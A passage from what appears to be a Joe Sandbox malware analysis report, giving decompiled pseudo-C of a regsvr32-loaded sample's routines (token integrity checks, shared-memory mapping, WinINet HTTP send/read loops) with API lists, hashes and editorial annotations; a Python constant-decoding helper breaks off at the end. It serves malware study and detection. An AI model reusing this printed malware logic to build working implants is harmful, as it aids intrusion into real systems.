                                • Opcode Fuzzy Hash: ff9632fe5bd2189e5b4d79a2ba5ec570219680c8e8d0120c4263a6d2c676a793
                                • Instruction Fuzzy Hash: C2311772A40206AFDB10DFA9CD90BEEFBF9EB48244B654869E545D7210FB30EA119B10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E02BD8E0D(intOrPtr __edx, void** _a4, void** _a8) {
                                				intOrPtr _v8;
                                				struct _FILETIME* _v12;
                                				short _v56;
                                				struct _FILETIME* _t12;
                                				intOrPtr _t13;
                                				void* _t17;
                                				void* _t21;
                                				intOrPtr _t27;
                                				long _t28;
                                				void* _t30;
                                
                                				_t27 = __edx;
                                				_t12 =  &_v12;
                                				GetSystemTimeAsFileTime(_t12);
                                				_push(0x192);
                                				_push(0x54d38000);
                                				_push(_v8);
                                				_push(_v12);
                                				L02BDAF68();
                                				_push(_t12);
                                				_v12 = _t12;
                                				_t13 =  *0x2bdd2a8; // 0x242a5a8
                                				_t5 = _t13 + 0x2bde87e; // 0x5008e26
                                				_t6 = _t13 + 0x2bde59c; // 0x530025
                                				_push(0x16);
                                				_push( &_v56);
                                				_v8 = _t27;
                                				L02BDAC0A();
                                				_t17 = CreateFileMappingW(0xffffffff, 0x2bdd2ac, 4, 0, 0x1000,  &_v56); // executed
                                				_t30 = _t17;
                                				if(_t30 == 0) {
                                					_t28 = GetLastError();
                                				} else {
                                					if(GetLastError() == 0xb7) {
                                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                						if(_t21 == 0) {
                                							_t28 = GetLastError();
                                							if(_t28 != 0) {
                                								goto L6;
                                							}
                                						} else {
                                							 *_a4 = _t30;
                                							 *_a8 = _t21;
                                							_t28 = 0;
                                						}
                                					} else {
                                						_t28 = 2;
                                						L6:
                                						CloseHandle(_t30);
                                					}
                                				}
                                				return _t28;
                                			}

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02BD2FFF,?,?,4D283A53,?,?), ref: 02BD8E19
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02BD8E2F
                                • _snwprintf.NTDLL ref: 02BD8E54
                                • CreateFileMappingW.KERNELBASE(000000FF,02BDD2AC,00000004,00000000,00001000,?), ref: 02BD8E70
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02BD2FFF,?,?,4D283A53), ref: 02BD8E82
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 02BD8E99
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02BD2FFF,?,?), ref: 02BD8EBA
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02BD2FFF,?,?,4D283A53), ref: 02BD8EC2
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: f22bc7b43f7270a76c6e168377b181896fb44b9f405cc59707606fb241693146
                                • Instruction ID: bd394631169f4a6cfe236410f4a5e8dbcad0ae18ee972bf8ce41908d6078ff58
                                • Opcode Fuzzy Hash: f22bc7b43f7270a76c6e168377b181896fb44b9f405cc59707606fb241693146
                                • Instruction Fuzzy Hash: 2621D2B6A81204BBD711AF64CC05FDE7BA9EB44751F150561F605E71D0FB70D905CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 93%
                                			E02BD58DB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                                				void* _t17;
                                				void* _t18;
                                				void* _t19;
                                				void* _t20;
                                				void* _t21;
                                				intOrPtr _t24;
                                				void* _t37;
                                				void* _t41;
                                				intOrPtr* _t45;
                                
                                				_t41 = __edi;
                                				_t37 = __ebx;
                                				_t45 = __eax;
                                				_t16 =  *((intOrPtr*)(__eax + 0x20));
                                				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                                					E02BD29C0(_t16, __ecx, 0xea60);
                                				}
                                				_t17 =  *(_t45 + 0x18);
                                				_push(_t37);
                                				_push(_t41);
                                				if(_t17 != 0) {
                                					InternetSetStatusCallback(_t17, 0);
                                					InternetCloseHandle( *(_t45 + 0x18)); // executed
                                				}
                                				_t18 =  *(_t45 + 0x14);
                                				if(_t18 != 0) {
                                					InternetSetStatusCallback(_t18, 0);
                                					InternetCloseHandle( *(_t45 + 0x14));
                                				}
                                				_t19 =  *(_t45 + 0x10);
                                				if(_t19 != 0) {
                                					InternetSetStatusCallback(_t19, 0);
                                					InternetCloseHandle( *(_t45 + 0x10));
                                				}
                                				_t20 =  *(_t45 + 0x1c);
                                				if(_t20 != 0) {
                                					CloseHandle(_t20);
                                				}
                                				_t21 =  *(_t45 + 0x20);
                                				if(_t21 != 0) {
                                					CloseHandle(_t21);
                                				}
                                				_t22 =  *((intOrPtr*)(_t45 + 8));
                                				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                                					E02BD8B22(_t22);
                                					 *((intOrPtr*)(_t45 + 8)) = 0;
                                					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                                				}
                                				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                                				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                					E02BD8B22(_t23);
                                				}
                                				_t24 =  *_t45;
                                				if(_t24 != 0) {
                                					_t24 = E02BD8B22(_t24);
                                				}
                                				_t46 =  *((intOrPtr*)(_t45 + 4));
                                				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                                					return E02BD8B22(_t46);
                                				}
                                				return _t24;
                                			}

                                APIs
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 02BD5909
                                • InternetCloseHandle.WININET(?), ref: 02BD590E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 02BD5919
                                • InternetCloseHandle.WININET(?), ref: 02BD591E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 02BD5929
                                • InternetCloseHandle.WININET(?), ref: 02BD592E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02BD93DC,?,?,00000000,00000000,74E481D0), ref: 02BD593E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02BD93DC,?,?,00000000,00000000,74E481D0), ref: 02BD5948
                                  • Part of subcall function 02BD29C0: WaitForMultipleObjects.KERNEL32(00000002,02BDA923,00000000,02BDA923,?,?,?,02BDA923,0000EA60), ref: 02BD29DB
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                                • String ID:
                                • API String ID: 2824497044-0
                                • Opcode ID: e92c0e0b5c3a816de3c8fee18824098aa3bbbf5042da20aed8122ac58dae586b
                                • Instruction ID: fe5a323678210d68bd1bacd22b58aa277f4a0e453a1fba4fcb3eff37ce17ae49
                                • Opcode Fuzzy Hash: e92c0e0b5c3a816de3c8fee18824098aa3bbbf5042da20aed8122ac58dae586b
                                • Instruction Fuzzy Hash: 59115E766006486BC630AFAAEC84C9BF7EEFF482253D50D59E186D3510E735F8498B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 100%
                                			E02BDA2C6(long* _a4) {
                                				long _v8;
                                				void* _v12;
                                				void _v16;
                                				long _v20;
                                				int _t33;
                                				void* _t46;
                                
                                				_v16 = 1;
                                				_v20 = 0x2000;
                                				if( *0x2bdd25c > 5) {
                                					_v16 = 0;
                                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                						_v8 = 0;
                                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                						if(_v8 != 0) {
                                							_t46 = E02BD1525(_v8);
                                							if(_t46 != 0) {
                                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                								if(_t33 != 0) {
                                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                								}
                                								E02BD8B22(_t46);
                                							}
                                						}
                                						CloseHandle(_v12);
                                					}
                                				}
                                				 *_a4 = _v20;
                                				return _v16;
                                			}

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02BDA2F8
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02BDA318
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02BDA328
                                • CloseHandle.KERNEL32(00000000), ref: 02BDA378
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02BDA34B
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02BDA353
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02BDA363
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: 6c1697077528abc7ba74cc5e6d3439ca01217fe93e799e0343ea07860b34aba2
                                • Instruction ID: 258d03f5f1c81df32ca04171c33863d7c03cc6c9da673d77b792d6bd06c5bd1e
                                • Opcode Fuzzy Hash: 6c1697077528abc7ba74cc5e6d3439ca01217fe93e799e0343ea07860b34aba2
                                • Instruction Fuzzy Hash: 96213975D40209FFEB009FA4DC44EEEBBBAEB48354F1040A5E550E7250E7719A55EF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 71%
                                			E02BD5988(void* __eax, void* __ecx) {
                                				long _v8;
                                				void* _v12;
                                				void* _v16;
                                				void _v20;
                                				void* __esi;
                                				void* _t30;
                                				int _t34;
                                				void* _t38;
                                				intOrPtr* _t39;
                                				intOrPtr* _t41;
                                				int _t45;
                                				void* _t54;
                                				long _t64;
                                				void* _t67;
                                				void* _t69;
                                
                                				_t58 = __ecx;
                                				_t67 = __eax;
                                				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                					L2:
                                					_t30 = _t67;
                                					_pop(_t68);
                                					_t69 = _t30;
                                					_t64 = 0;
                                					ResetEvent( *(_t69 + 0x1c));
                                					_t34 = InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8); // executed
                                					if(_t34 != 0) {
                                						L9:
                                						if(_v8 == 0) {
                                							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                						} else {
                                							 *0x2bdd164(0, 1,  &_v12); // executed
                                							if(0 != 0) {
                                								_t64 = 8;
                                							} else {
                                								_t38 = E02BD1525(0x1000);
                                								_v16 = _t38;
                                								if(_t38 == 0) {
                                									_t64 = 8;
                                								} else {
                                									_push(0);
                                									_push(_v8);
                                									_push( &_v20);
                                									while(1) {
                                										_t41 = _v12;
                                										_t61 =  *_t41;
                                										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                										ResetEvent( *(_t69 + 0x1c));
                                										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
                                										if(_t45 != 0) {
                                											goto L17;
                                										}
                                										_t64 = GetLastError();
                                										if(_t64 == 0x3e5) {
                                											_t64 = E02BD29C0( *(_t69 + 0x1c), _t61, 0xffffffff);
                                											if(_t64 == 0) {
                                												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                												if(_t64 == 0) {
                                													goto L17;
                                												}
                                											}
                                										}
                                										L19:
                                										E02BD8B22(_v16);
                                										if(_t64 == 0) {
                                											_t64 = E02BD48CB(_v12, _t69);
                                										}
                                										goto L22;
                                										L17:
                                										_t64 = 0;
                                										if(_v8 != 0) {
                                											_push(0);
                                											_push(_v8);
                                											_push(_v16);
                                											continue;
                                										}
                                										goto L19;
                                									}
                                								}
                                								L22:
                                								_t39 = _v12;
                                								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                							}
                                						}
                                					} else {
                                						_t64 = GetLastError();
                                						if(_t64 != 0x3e5) {
                                							L8:
                                							if(_t64 == 0) {
                                								goto L9;
                                							}
                                						} else {
                                							_t64 = E02BD29C0( *(_t69 + 0x1c), _t58, 0xffffffff);
                                							if(_t64 == 0) {
                                								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                								goto L8;
                                							}
                                						}
                                					}
                                					return _t64;
                                				} else {
                                					_t54 = E02BD57DD(__ecx, __eax);
                                					if(_t54 != 0) {
                                						return _t54;
                                					} else {
                                						goto L2;
                                					}
                                				}
                                 			}

                                 (per-statement address column omitted; statements at 0x02bd5988-0x02bd59a3 and 0x02bda556-0x02bda676)

                                APIs
                                • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 02BDA55D
                                • InternetReadFile.WININET(?,?,00000004,?), ref: 02BDA56C
                                • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 02BDA576
                                • ResetEvent.KERNEL32(?), ref: 02BDA5EF
                                • InternetReadFile.WININET(?,?,00001000,?), ref: 02BDA600
                                • GetLastError.KERNEL32 ref: 02BDA60A
                                  • Part of subcall function 02BD57DD: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 02BD57F4
                                  • Part of subcall function 02BD57DD: SetEvent.KERNEL32(?), ref: 02BD5804
                                  • Part of subcall function 02BD57DD: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02BD5836
                                  • Part of subcall function 02BD57DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02BD585B
                                  • Part of subcall function 02BD57DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02BD587B
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                 • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                 • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                • String ID:
                                • API String ID: 2393427839-0
                                • Opcode ID: 5f3139dafac3acca1e9d721ace308241894e8c97740a93193d318d8d768675ff
                                • Instruction ID: 478f39b30cf755048b21cf9eae069d6a22f04161b8401dba8330aa396373f204
                                • Opcode Fuzzy Hash: 5f3139dafac3acca1e9d721ace308241894e8c97740a93193d318d8d768675ff
                                • Instruction Fuzzy Hash: 7641C536A00605EBCB219FA4DC44FEEB7B9EF843A4F1105A9E556D7290FB70E941CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E02BD2789(void* __ecx, void* __edx, intOrPtr _a4) {
                                				struct _FILETIME _v12;
                                				void* _t10;
                                				void* _t12;
                                				int _t14;
                                				signed int _t16;
                                				void* _t18;
                                				signed int _t19;
                                				unsigned int _t23;
                                				void* _t27;
                                				signed int _t34;
                                
                                				_t27 = __edx;
                                				_push(__ecx);
                                				_push(__ecx);
                                 				_t10 = HeapCreate(0, 0x400000, 0); // executed; private growable heap with 4 MiB initial commit, handle kept in the global at 0x2bdd238
                                				 *0x2bdd238 = _t10;
                                				if(_t10 != 0) {
                                					 *0x2bdd1a8 = GetTickCount();
                                					_t12 = E02BD9EBB(_a4);
                                					if(_t12 == 0) {
                                 						do {
                                 							GetSystemTimeAsFileTime( &_v12);
                                 							_t14 = SwitchToThread();
                                 							_t23 = _v12.dwHighDateTime;
                                 							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5; // decompiler's rendering of the 64-bit FILETIME shifted right by 5
                                 							_push(0);
                                 							_push(0x13);
                                 							_push(_t23 >> 5);
                                 							_push(_t16);
                                 							L02BDB0CA(); // _aullrem thunk: unsigned 64-bit remainder of (FILETIME >> 5) modulo 0x13
                                 							_t34 = _t14 + _t16;
                                 							_t18 = E02BD122B(_a4, _t34); // work item seeded with the time-derived value
                                 							_t19 = 3;
                                 							_t26 = _t34 & 0x00000007;
                                 							Sleep(_t19 << (_t34 & 0x00000007)); // executed; jittered back-off of 3 << (n & 7) ms, i.e. 3 to 384 ms, before the next attempt
                                 						} while (_t18 == 1); // retry while E02BD122B reports 1
                                						if(E02BD4D4D(_t26) != 0) {
                                							 *0x2bdd260 = 1; // executed
                                						}
                                						_t12 = E02BD2F70(_t27); // executed
                                					}
                                 				} else {
                                 					_t12 = 8; // 8 == ERROR_NOT_ENOUGH_MEMORY, returned when the private heap could not be created
                                 				}
                                				return _t12;
                                 			}

                                 (per-statement address column omitted; statements at 0x02bd2789-0x02bd2834)

                                APIs
                                • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,02BD7F25,?), ref: 02BD279C
                                • GetTickCount.KERNEL32 ref: 02BD27B0
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,02BD7F25,?), ref: 02BD27CC
                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,02BD7F25,?), ref: 02BD27D2
                                • _aullrem.NTDLL(?,?,00000013,00000000), ref: 02BD27EF
                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,02BD7F25,?), ref: 02BD280C
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                 • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                 • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                • String ID:
                                • API String ID: 507476733-0
                                • Opcode ID: 4d30af5d87b7ab4161a5412e16fc757253243e60c8bf72ed258718a3556bbf16
                                • Instruction ID: b499821f1ca6eafbf268d140cfd80bbbd15e5129888f902a8c0cb1e484970f8f
                                • Opcode Fuzzy Hash: 4d30af5d87b7ab4161a5412e16fc757253243e60c8bf72ed258718a3556bbf16
                                • Instruction Fuzzy Hash: 7F11E572E81201ABD7206BB4DC29BDA7AA9EF44394F00496AFD45C7280FB70E850CA64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                 Control-flow Graph
                                 (graph image not reproduced; basic blocks 0x02bd97f7-0x02bd986d, calling E02BD8CFA, E02BDA85C, ResetEvent twice, HttpSendRequestA, GetLastError and SetEvent; the executed/not-executed colouring is lost)
                                C-Code - Quality: 100%
                                			E02BD97F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                				void* __esi;
                                				long _t10;
                                				void* _t18;
                                				void* _t22;
                                
                                				_t9 = __eax;
                                				_t22 = __eax;
                                				if(_a4 != 0 && E02BD8CFA(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                					L9:
                                					return GetLastError();
                                				}
                                				_t10 = E02BDA85C(_t9, _t18, _t22, _a8); // executed
                                				if(_t10 == 0) {
                                 					ResetEvent( *(_t22 + 0x1c)); // two per-request event handles live at +0x1c and +0x20 of the request object
                                 					ResetEvent( *(_t22 + 0x20));
                                 					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) { // hRequest at +0x18, no extra headers (length -1), no body
                                 						SetEvent( *(_t22 + 0x1c)); // synchronous completion: signal the "sent" event immediately
                                 						goto L7;
                                 					} else {
                                 						_t10 = GetLastError();
                                 						if(_t10 == 0x3e5) { // 0x3e5 == ERROR_IO_PENDING: asynchronous send accepted, treated as success
                                 							L7:
                                 							_t10 = 0;
                                 						}
                                 					}
                                 				}
                                 				if(_t10 == 0xffffffff) { // a -1 from E02BDA85C is converted into the Win32 last error
                                					goto L9;
                                				}
                                				return _t10;
                                 			}

                                 (per-statement address column omitted; statements at 0x02bd97f7-0x02bd986d)

                                APIs
                                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,02BD937B,?,?,00000000,00000000), ref: 02BD9831
                                • ResetEvent.KERNEL32(?), ref: 02BD9836
                                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02BD9843
                                • GetLastError.KERNEL32 ref: 02BD984E
                                • GetLastError.KERNEL32(?,?,00000102,02BD937B,?,?,00000000,00000000), ref: 02BD9869
                                  • Part of subcall function 02BD8CFA: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,02BD9816,?,?,?,?,00000102,02BD937B,?,?,00000000), ref: 02BD8D06
                                  • Part of subcall function 02BD8CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02BD9816,?,?,?,?,00000102,02BD937B,?), ref: 02BD8D64
                                  • Part of subcall function 02BD8CFA: lstrcpy.KERNEL32(00000000,00000000), ref: 02BD8D74
                                • SetEvent.KERNEL32(?), ref: 02BD985C
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                 • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                 • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 3739416942-0
                                • Opcode ID: 3d964cd936041bc41fc21de19c254645616316c8c4c784c7d345eea7a388632c
                                • Instruction ID: 9c06bfb5801b5b5f469e6c14dfc8f72289d58079efe13fcfda79c0e345b38d5d
                                • Opcode Fuzzy Hash: 3d964cd936041bc41fc21de19c254645616316c8c4c784c7d345eea7a388632c
                                • Instruction Fuzzy Hash: 57018131181B01ABDB316B32DC44FDBBAA9EF48BA8F104B65F551D60E0F722F815DA61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                 Control-flow Graph
                                 (graph image not reproduced; basic blocks 0x02bd1128-0x02bd1185, calling RtlEnterCriticalSection, Sleep, E02BD4A2A and RtlLeaveCriticalSection; the executed/not-executed colouring is lost)
                                C-Code - Quality: 50%
                                			E02BD1128(void** __esi) {
                                				intOrPtr _v0;
                                				intOrPtr _t4;
                                				intOrPtr _t6;
                                				void* _t8;
                                				void* _t9;
                                				intOrPtr _t10;
                                				void* _t11;
                                				void** _t13;
                                
                                				_t13 = __esi;
                                 				_t4 =  *0x2bdd32c; // 0x50095b0 (the 0x60-byte global context allocated in E02BD2F70 below)
                                 				__imp__(_t4 + 0x40); // RtlEnterCriticalSection(ctx + 0x40); the decompiler lost the import name, see the APIs list below
                                 				while(1) {
                                 					_t6 =  *0x2bdd32c; // 0x50095b0
                                 					_t1 = _t6 + 0x58; // 0x0
                                 					if( *_t1 == 0) { // spin until the busy flag at ctx + 0x58 clears
                                 						break;
                                 					}
                                 					Sleep(0xa); // 10 ms between polls
                                 				}
                                 				_t8 =  *_t13;
                                 				if(_t8 != 0 && _t8 != 0x2bdd030) { // free the old buffer unless it is NULL or the built-in default at 0x2bdd030
                                 					HeapFree( *0x2bdd238, 0, _t8); // private heap created in E02BD2789
                                 				}
                                 				_t9 = E02BD4A2A(_v0, _t13); // executed
                                 				_t13[1] = _t9; // result stored in the caller's second slot
                                 				_t10 =  *0x2bdd32c; // 0x50095b0
                                 				_t11 = _t10 + 0x40;
                                 				__imp__(_t11); // RtlLeaveCriticalSection(ctx + 0x40)
                                				return _t11;
                                 			}

                                 (per-statement address column omitted; statements at 0x02bd1128-0x02bd1185)

                                APIs
                                • RtlEnterCriticalSection.NTDLL(05009570), ref: 02BD1131
                                • Sleep.KERNEL32(0000000A,?,02BD30F3), ref: 02BD113B
                                • HeapFree.KERNEL32(00000000,00000000,?,02BD30F3), ref: 02BD1163
                                • RtlLeaveCriticalSection.NTDLL(05009570), ref: 02BD117F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                 • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                 • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: 394ab215f1c226969244b10bc34828f7af6d57cb82b9193323772ed9508b290a
                                • Instruction ID: bd11b855165274857c83ba039e0059c3441367d118226a64550c63cdb8782cd6
                                • Opcode Fuzzy Hash: 394ab215f1c226969244b10bc34828f7af6d57cb82b9193323772ed9508b290a
                                • Instruction Fuzzy Hash: 96F03A72A822029FD7109F68DC68B867FA8EF043C0B408845F585C7150F320D8A0CB14
                                Uniqueness

                                Uniqueness Score: -1.00%
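                                 The numeric constants in these listings are the quickest way to confirm what the loops are doing: the `== 0x3e5` tests in the read and send routines, the HttpQueryInfoA info levels in the API list of the InternetReadFile loop at the top of this section (refs 02BD5836 and 02BD585B), and the little-endian dword hints the IDA plugin prints after pointer arithmetic (`// 0x697a6f4d` in the E02BD2F70 listing that follows). The Python helper below is added here by the editor; it is not part of the Joe Sandbox report or of the sample. It decodes those hints to ASCII and names the constants, the input strings are lines copied from this page, and the function names are the editor's own.

```python
import re
import struct

# Constructed input: lines copied from the decompiled listings on this page.
SAMPLE_LISTING = """
_t8 = _t26 + 0x2bde5cd; // 0x4d283a53
_t7 = _t26 + 0x2bde9f5; // 0x44283a44
_t13 = _t58 + 0x2bde55a; // 0x697a6f4d
_t1 = _t6 + 0x58; // 0x0
if(_t64 == 0x3e5) {
"""

# Constructed input: entries copied from the "APIs" lists on this page.
SAMPLE_APIS = """
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02BD5836
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02BD585B
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02BD9843
"""

# Values from the Windows SDK headers (winerror.h, wininet.h).
WIN32_ERRORS = {0x3e5: "ERROR_IO_PENDING", 0x8: "ERROR_NOT_ENOUGH_MEMORY"}
HRESULTS = {0x0: "S_OK", 0x1: "S_FALSE", 0x80010106: "RPC_E_CHANGED_MODE"}
HTTP_QUERY_LEVELS = {0x13: "HTTP_QUERY_STATUS_CODE", 0x16: "HTTP_QUERY_RAW_HEADERS_CRLF"}
HTTP_QUERY_FLAGS = {
    0x20000000: "HTTP_QUERY_FLAG_NUMBER",
    0x40000000: "HTTP_QUERY_FLAG_SYSTEMTIME",
    0x80000000: "HTTP_QUERY_FLAG_REQUEST_HEADERS",
    0x10000000: "HTTP_QUERY_FLAG_COALESCE",
}

# "_tX = _tY + 0xDISP; // 0xDWORD" : the plugin shows the dword found at the computed address.
HINT_RE = re.compile(r"(_t\d+)\s*=\s*(_t\d+)\s*\+\s*(0x[0-9a-f]+);\s*//\s*(0x[0-9a-f]{1,8})", re.I)
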